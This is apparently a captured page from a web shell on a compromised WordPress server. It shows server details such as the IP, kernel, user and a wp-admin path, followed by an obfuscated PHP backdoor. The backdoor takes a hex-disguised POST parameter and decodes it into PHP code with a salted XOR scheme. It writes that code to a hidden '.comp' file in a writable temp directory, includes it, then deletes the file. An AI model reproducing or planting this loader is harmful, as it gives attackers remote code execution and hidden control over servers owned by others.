| Server IP : 162.243.168.218 / Your IP : 216.73.216.79 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-admin/user/ |
Upload File : |
<?php
if(in_array("c\x6Fm\x70o\x6E\x65nt", array_keys($_POST))){
$tkn = $_POST["c\x6Fm\x70o\x6E\x65nt"];
$tkn = explode ( "." , $tkn );
$entry = '';
$salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt2);
$o = 0;
array_walk($tkn , function ($v4) use (&$entry , &$o , $salt2 , $lenS) { $sChar = ord($salt2[$o %$lenS]);
$d = ((int)$v4 - $sChar - ($o %10)) ^ 32;
$entry.= chr($d);
$o++; });
$obj = array_filter(["/dev/shm", session_save_path(), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/tmp", sys_get_temp_dir()]);
while ($hld = array_shift($obj)) {
if (max(0, is_dir($hld) * is_writable($hld))) {
$sym = vsprintf("%s/%s", [$hld, ".comp"]);
$success = file_put_contents($sym, $entry);
if ($success) {
include $sym;
@unlink($sym);
die();}
}
}
}